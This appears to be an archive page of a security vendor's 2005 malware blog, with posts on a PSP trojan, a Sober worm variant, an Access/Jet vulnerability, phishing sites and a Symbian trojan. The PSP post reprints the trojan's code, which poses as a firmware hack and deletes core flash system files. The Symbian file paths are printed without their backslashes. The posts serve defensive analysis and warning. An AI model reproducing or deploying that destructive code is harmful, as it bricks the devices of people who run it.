検索:

First PSP Trojan

  • 投稿日:2005年10月7日
  • 執筆:ウイルス解析担当者
0

Malware are not for computers alone. Some have evolved to infecting even mobile devices and not to mention some mp3 players too. And now…. they have found another target and you may be one of them, the videogame-enthusiasts. The first trojan for Sony Playstation Portable, otherwise known as PSP has now been found. Originally PSP can only run games which are approved by Sony but of course almost if not all is possible in the computing world — hacks are available which allow users to run their own games. The trojan disguises as some hacking tool to get on board for some other games. Instead, it deletes system files, rendering the machine to be inoperable. Affected systems are those PSPs which had older firmware versions such as 1.50. Each day, malware authors have thought of widening the horizons for infection, the question now lies… what could be next?

Here is the code as seen in some forum:

_start:


while(1)

sceIoAssign:

syscall 0x20a8

sceIoRemove:

syscall 0x209e

main:

call FillVram(0)
call Print(1,1,0xFFFFFF,”PSP TEAM 2.0 Exploit Hack the 2.0 firmware”)
call Print(1,2,0xFFFFFF,”Thank’s to toc2rta for the 2.0 exploit :) “)
call sceIoAssign(“flash6:”, “lflash0:0,0”, “flashfat2:”, 0, 0, 0)
call sceIoRemove(“flash6:/vsh/etc/index.dat”)
call sceIoRemove(“flash6:/kd/loadcore.prx”)
call sceIoRemove(“flash6:/kd/loadexec.prx”)
call sceIoRemove(“flash6:/kd/init.prx”)
call Print(1,4,0xFFFFFF,” Your 2.0 is hacked please reboot “)
call Print(1,5,0xFFFFFF,” Thank you PSP Team the french team”)
call Print(1,6,0xFFFFFF,” FuCk yoshihiro and SonyxTeam Looser”)


Meanwhile, we are currently acquiring sample so heads up for updates.

For more information, you may visit this site.

続きを読む

New Sober worm: WORM_SOBER.AC

  • 投稿日:2005年10月6日
  • 執筆:ウイルス解析担当者
0

We are able to obtain samples of a new variant or the Sober worm through our handy dandy email honeypot system at approximately 8am this morning. Staying true to its Sober-like characteristics, this worm spreads via email and uses its own SMTP engine.

As of the moment, we have an incident count of 300 emails intercepted by the honeypot, and counting.
For further details, refer to the virus report which is now available for your viewing pleasure.

続きを読む

Trojans Exploit Unpatched Microsoft Access Vulnerability

  • 投稿日:2005年10月6日
  • 執筆:ウイルス解析担当者
0

A macro script embedded in a .mdb file has been known to exploit a vulnerability in Microsoft Access “Microsoft Jet Database Engine Malformed Database File Buffer Overflow Vulnerability”, this leads to the infection of the user’s system.
This macro script is now detected as A2KM_HESIB.A.

Once this .mdb file (A2KM_HESIB.A) is opened in Microsoft Access it uses the vulnerability mentioned above to drop and execute an exe file named CSRSE.EXE (BKDR_HESIB.A) in the Windows temporary folder.

This shows that malware authors’ attacks doesn’t only include Internet Explorer and Windows OS vulnerabilities but also Microsoft Office Applications.

Another malware which targets Microsoft Office Applications is the malware family W2KM.PASSPRO



The vulnerability mentioned above still remains unpatched.

続きを読む

eBay Phishing Scam

  • 投稿日:2005年10月4日
  • 執筆:ウイルス解析担当者
0

We have received a sample email of eBay phishing scam.

In an attempt to fool the recipient of the email to follow the hyperlink provided (see sample email below), it disguises as if it originates from eBay Safeharbor Department and notifies the eBay member that someone might have been using his/her account and will be suspended on the next 72 hours, unless updated.

Sample Email




If the unsuspected user clicks the hyperlink, he/she will be redirected to this page.




Notice the difference between the displayed url in the email and the destination url, it’s very different right? This should be suspicious enough not to disclose any critical information on the site. But, if the unaware user continues to enter his/her account information, he/she will end up on this page (see below).




If the still unaware user proceeds to disclose very critical information such as those asked above, the next time that he receives a notification email from eBay might just get real!

続きを読む

On MS Jet Vulnerability

  • 投稿日:2005年10月4日
  • 執筆:ウイルス解析担当者
0

We received reports on a malware utilizing a known vulnerability found in Microsoft”s Jet Database engine software. This vulnerability was known to public last April 2005 and is related to specially crafted .mdb files. The detection for the said malware is TROJ_MSADB.B.

For now, we are currently in the process of acquiring undetected samples of malwares that utilizes this vulnerability. It is noted that Microsoft still does not have a fix on this and malware authors may exploit this known vulnerability even more. It is then recommended that users be aware of this vulnerability and not to trust unsolicited .mdb files even if it came from known contacts.

続きを読む

Redcross Phishing Site

  • 投稿日:2005年10月4日
  • 執筆:ウイルス解析担当者
0

Are you some kind of a philanthropist and willing to help those in need?

I hope your donations will really reach those who need it and not those opportunistic phishers waiting to get rich!

I got an alert from one of our sources that there is a Redcross phishing site set-up in the internet. I verified the information and found out that it is indeed a Redcross phishing site! Look below and take a look at the supposedly Redcross’s donation page.


click to enlarge


At first look, it may look legit but, look again emphasizing on the url of the site (refer to the enlarged picture). Now, does it still look legitimate to you? I hope you will agree with me for a big NO! That is one of the common techniques of Phishing, the supposedly real url is appended at the end of the actual site or domain you are visiting (in this case its www.quadrate-stadt.de). This may actually happen to those users who do not enable the view for the address bar.




By enabling the view for the address bar you can have an idea of what site or domain you are really in.

Notice the distorted rollover image (enclosed by the smaller circle)? This must have been intentional because the location where the rollover image points to is the same location where you will be redirected after you have provided the required information and pressed the continue button as shown in the next picture.




Now, this should be a lesson for all those people who use their credit or debit cards or same sort online, to be responsible enough not to disclose any information on an unsecured channel, which in this case is the use of http protocol. We should be aware that the current standard way of disclosing such information is through the use of SSL protocol or simply put sites that starts withhttps. In this way, we have at least an assurance that the information that we send in the internet is really going to the right recipient and the information is intact.

I”ve checked the different urls presented on the web site and I found out that only the location where “Continue”, “Cancel”, and “Verisign” buttons point to are the fake ones. So, if you will try to check the other clickable images or hyperlinks on the site aside from the three (3) buttons just mentioned, you will be redirected to the real site! Stealthy, isn”t it?




There are a number of phishing sites out there in the World Wide Web and many of them can be circumvented by just observing basic security measures just as I mentioned above.

These phishers continually operates or sad to say, getting inspired to set-up one because there are many online users who are still getting hooked by their scams.

If we can at least update ourselves on the current threats and especially their countermeasures such as these, we are one step ahead to securing our own identity and at the same time helping the security community to fight against this malicious activity.

And most importantly, your offered help will be received by those who really need it!:=)

続きを読む

Another eBay Phishing Scam

  • 投稿日:2005年10月3日
  • 執筆:ウイルス解析担当者
0

Just a couple of hours ago, we received another sample email related to eBay phishing scam.

Only this time, it is more straightforward and from 72 hours of not verifying the information emailed, it was lessened to 48 hours until the account will be suspended by ‘them’. See the sample email below.




Now if you follow the first hyperlink in the email you will arrived at this page.




Now, that’s what I called straightforward! It just needs a click away to take away your identity, ha!

Notice again the difference between the displayed url in the email and the destination url? That should make you think that something ‘phishy’ is going on, at least. And what’s more suspicious about the website is the fact that it mentions

“All the data is protected by the industry standard SSL encryption”

whereas, the session is only using http protocol!

Conlusion
As we are all aware of, it was in the year 2003 where we have seen the proliferation of eBay phishing scams where users receive emails that alert them to verify and update their account information within the specified time, else the account will be suspended.

It seems like a lot are still being fooled by this scam that’s why many fake eBay sites are still being set-up, online, and ready to steal away your identity, anytime you choose to be!

続きを読む

YM Phising Site

  • 投稿日:2005年9月27日
  • 執筆:ウイルス解析担当者
0

There is a new Yahoo phising site spotted located at
http://www.geocities.com/myphotos30021. It spoofs the Yahoo!Photos site.
Below is a snapshot of the site. Just click the picture for a fuller view.

The site has already been submitted to Web Blocking Team.

続きを読む
Tags: スミッシング

Update Wi-Fi Worms?!?

  • 投稿日:2005年9月27日
  • 執筆:ウイルス解析担当者
0


As of time of writing, no security firm or individual has been able to confirm the credibility of the report. The security community awaitedly asking for the binaries of the much hyped worm to further prove to the public that they really exists but even the individual (Vlad) who claims that his machine has been infected can not provide one.

Vlad had even posted a TCPDump of the said activity of the Wi-Fi worm but what is noticeable upon skimming through the log is the fact that there is no 802.11 traffic that can be extracted from the log because all are Ethernet traffic.

I guess this issue has been so much a hyped just to get the attention of some individuals/firms. I’d say he has succeeded even this early because even people from Internet Storm Center has devoted time to do some passive analysis on the area.

But, nobody has been able to provide consistent and real proofs.
As of time of writing, no security firm or individual has been able to confirm the credibility of the report. The security community awaitedly asking for the binaries of the much hyped worm to further prove to the public that they really exists but even the individual (Vlad) who claims that his machine has been infected can not provide one.

続きを読む
Tags: スミッシング

New Symbian Malware attempts to infect Windows

  • 投稿日:2005年9月27日
  • 執筆:ウイルス解析担当者
0


This new symbian malware is similar to other symbian malware in the sense that it overwrites normal files in the system in order to destroy them. However, it has a particularly interesting characteristic where it attempts to spread infection to a computer running in Windows OS. This is because this malware drops these 4 files into the E: directory (which is the memory card):


fsb.exe – BKDR_BERBEW.Q
buburuz.ICO – Icon file for the memory card
autorun.inf – file used to automatically execute fsb.exe
SYSTEM.exe – WORM_WUKILL.B


Thus, when the memory card is inserted into a Windows computer, the file autorun.inf will attempt to execute fsb.exe. Also, the file SYSTEM.exe may not have an automatic startup routine, but since it has the icon of a folder, this could be executed by an unsuspecting user who wants to open this “folder”.

Note: This malware will be detected as SYMBOS_CARDTRP.A


Dropped Files

  • E:DOCUME~1BimLOCALS~1TempMKS0CARIBE.SIS – already detected as SymbOS_CABIR.A
  • E:SYSTEM.exe – already detected as WORM_WUKILL.B
  • E:fsb.exe – already detected as BKDR_BERBEW.Q
  • E:SystemAppsWILDSKINWILDSKIN.App
  • C:SystemAppsWALLETAVMGMTWALLETAVMGMT.App
  • C:SystemAppsVoicerecorderVoicerecorder.app
  • C:SystemAppsVoiceRecVoiceRec.app
  • C:SystemAppsVMVm.app
  • C:SystemAppsVideorecorderVideoRecorder.app
  • C:SystemAppsVCommandVCommand.app
  • E:SystemAppsUVSMStyleUVSMStyle.App
  • E:SystemAppsUltraMP3UltraMP3.App
  • C:SystemAppsTodoTodo.app
  • E:SystemAppsSystemExplorerSystemExplorer.App
  • C:SystemAppssSaversSaver.App
  • C:SystemAppsSpeedDialSpeeddial.app
  • E:SystemAppsSounderSounder.App
  • C:SystemAppsSnakeExSnakeEx.app
  • E:SystemAppsSmsMachineSmsMachine.App
  • E:SystemAppsSmartMovieSmartMovie.App
  • E:SystemAppsSmartAnswerSmartAnswer.App
  • C:SystemAppsSimDirSimDir.app
  • E:SystemAppsScreenCapScreenCap.app
  • C:SystemAppsSatUiSatui.app
  • E:SystemAppsRingMasterRingMaster.App
  • C:SystemAppsRealPlayerRealPlayer.app
  • E:SystemAppsRallyProContestRallyProContest.App
  • E:SystemAppsPVPlayerPVPlayer.App
  • C:SystemAppsPslnPSLN.app
  • C:SystemAppsProfileAppProfileApp.app
  • C:SystemAppsPinboardPinboard.app
  • E:SystemAppsPhotoSMSPhotoSMS.App
  • E:SystemAppsPhotoSafePhotoSafe.App
  • E:SystemAppsPhotographerPhotographer.app
  • E:SystemAppsPhotoEditorPhotoEditor.app
  • C:SystemAppsPhotoAlbumPhotoAlbum.app
  • E:SystemAppsphotoacutephotoacute.App
  • C:SystemAppsPhoneBookPhoneBook.app
  • !:SystemAppsPhoneFREAKPHONE_CAPTION.RSC
  • !:SystemAppsPhoneFREAKPHONE.RSC
  • E:SystemAppsPhoneFREAKPHONE.APP
  • E:SystemAppsPhoneFreakPhone.aif
  • C:SystemAppsNSmlDSSyncNSmlDSSync.app
  • C:SystemAppsNotepadNotepad.app
  • C:SystemAppsMusicPlayerMusicPlayer.app
  • E:SystemAppsMp3PlayerMp3Player.App
  • E:SystemAppsMp3GoMp3Go.App
  • C:SystemAppsmmpmmp.App
  • C:SystemAppsMMCAppMMCApp.app
  • C:SystemAppsMixPixMixPix.app
  • C:SystemAppsMidpUiMidpUi.app
  • E:SystemAppsMIDIEDMIDIED.App
  • !:SystemAppsMenuFreakMenu_caption.rsc
  • !:SystemAppsMenuFREAKMENU.RSC
  • !:SystemAppsMenuFREAKMENU.APP
  • E:SystemAppsMenuFreakMenu.aif
  • C:SystemAppsMediaplayerMediaPlayer.app
  • C:SystemAppsMediaGalleryMediaGallery.app
  • C:SystemAppsMCEMCE.app
  • C:SystemAppsLogsLogs.app
  • E:SystemAppslogoManlogoMan.app
  • E:SystemAppsLauncherLauncher.app
  • E:SystemAppsKPCaMainKPCaMain.App
  • E:SystemAppsJellyJelly.App
  • E:SystemAppsirremoteirRemote.App
  • C:SystemAppsIrAppIrApp.app
  • E:SystemAppsHantroCPHantroCP.App
  • E:SystemAppsHairHair.App
  • C:SystemAppsGSGS.app
  • E:SystemAppsFSCallerFSCaller.App
  • C:SystemAppsFMRadioFMRadio.app
  • C:SystemAppsFileManagerFileManager.app
  • E:SystemAppsFExplorerFExplorer.App
  • C:SystemAppsFdnFDN.app
  • C:SystemAppsFaxModemUiFaxModemUi.app
  • E:SystemAppsFaceWarpFaceWarp.App
  • E:SystemAppsextendedrecorderextendedrecorder.App
  • E:SystemAppsETIPlayerETIPlayer.App
  • E:SystemAppsETIMovieAlbumETIMovieAlbum.App
  • E:SystemAppsETICamcorderETICamcorder.App
  • C:SystemAppsCSHelpCSHelp.app
  • C:SystemAppsConverterConverter.app
  • C:SystemAppsConnectionMonitorUiConnectionMonitorUi.app
  • C:SystemAppsComposerComposer.app
  • C:SystemAppsClockAppClockApp.app
  • E:SystemAppsCFCF.app
  • E:SystemAppscamerafxCameraFX.App
  • C:SystemAppsCameraCamera.app
  • C:SystemAppsCamcorderCamcorder.app
  • E:SystemAppsCamcoderCamcoder.App
  • E:SystemAppsCallManagerCallManager.App
  • E:SystemAppscallcheatercallcheater.app
  • C:SystemAppsCalendarCalendar.app
  • C:SystemAppsCalcSoftCalcSoft.app
  • C:SystemAppsBrowserBrowser.app
  • E:SystemAppsBlueJackXBlueJackX.App
  • E:SystemAppsBlackListBlackList.App
  • C:SystemAppsAppMngrAppMngr.app
  • C:SystemAppsAppCtrlAppCtrl.app
  • E:SystemAppsAnswRecAnswRec.App
  • E:SystemAppsAD7650AD7650.App
  • C:SystemAppsAboutAbout.app
  • E:buburuz.ICO
  • E:autorun.inf
  • PopUp0.txt



Update
Previously, we have come to define an example of a “blended threat” as a Windows worm that either spreads via multiple propagation vectors such as email, IM, network shares and application vulnerabilities and/or a worm that has capabilities of other malwares such as file-infectors, backdoor trojans or even spywares.

Now, we may see a slightly new encounter of another implementation of what a “blended threat” is or could be in the near future – a mobile malware that has the capability to affect the Windows platform!… Ergo, let the battlecry linger on – Let’s continue to be vigilant!

As Raimund Genes, Trend Micro Chief Technologist Anti-Malware has said. “As mobile threats continue to evolve, it’s likely that we will see further attacks similar to this, but utilizing more robust propagation techniques and therefore carrying a higher potential for infection.”

続きを読む
Tags: スミッシング
Page 249 of 250 « ‹ 248249250 ›


  • 個人のお客さま向けオンラインショップ
  • |
  • 法人のお客さま向け直営ストア
  • |
  • 販売パートナー検索
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • 電子公告
  • ご利用条件
  • プライバシーポリシー
  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.